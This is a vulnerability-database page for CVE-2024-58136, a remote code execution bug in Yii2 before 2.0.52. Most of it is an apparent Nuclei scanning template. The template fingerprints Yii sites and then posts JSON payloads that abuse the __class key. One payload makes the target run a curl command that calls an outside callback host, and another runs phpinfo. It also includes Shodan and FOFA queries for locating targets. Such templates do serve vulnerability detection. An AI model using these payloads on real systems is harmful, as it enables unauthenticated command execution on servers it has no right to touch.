CVE-2024-58136: Yii2 PHP Framework < 2.0.52 - Remote Code Execution

2025-08-01 Yii2 PHP Framework PoC Public

Description

Yii2 PHP Framework before 2.0.52 is vulnerable to remote code execution via improper validation of the __class key in JSON behaviors. An attacker can instantiate arbitrary PHP classes and achieve RCE.

PoC

id: CVE-2024-58136

info:
  name: Yii2 PHP Framework < 2.0.52 - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    Yii2 PHP Framework before 2.0.52 is vulnerable to remote code execution via improper validation of the __class key in JSON behaviors. An attacker can instantiate arbitrary PHP classes and achieve RCE.
  impact: |
    Unauthenticated attackers can exploit improper validation of the __class key in JSON behaviors to instantiate arbitrary PHP classes and achieve remote code execution.
  remediation: |
    Update Yii2 PHP Framework to version 2.0.52 or later to address the remote code execution vulnerability.
  reference:
    - https://infosecwriteups.com/from-behaviors-to-shells-yii2-php-framework-rce-cve-2024-58136-exploit-and-mitigation-e47a60a3cecb
    - https://nvd.nist.gov/vuln/detail/CVE-2024-58136
  classification:
    epss-score: 0.87634
    epss-percentile: 0.9975
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-58136
    cwe-id: CWE-94
    cpe: cpe:2.3:a:yiisoft:yii:2.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: yiisoft
    product: yii
    fofa-query: title="Yii"
    shodan-query: title:"Yii"
  tags: cve,cve2024,yii2,rce,php,framework,kev,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        words:
          - "Yii"
        internal: true

  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream":"curl {{interactsh-url}}"}}

      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "phpinfo"}}

    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        words:
          - "PHP Version"
          - "PHP Extension"
        condition: and
# digest: 4a0a004730450221008752e08cf4cbd17e769e1dfc38461a9bc4f148e8b990572d80dda4b311c9d8e60220410ff0699f679735317924254f81abee3f47dd95d6e7a2b16a91b870cd00f03c:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities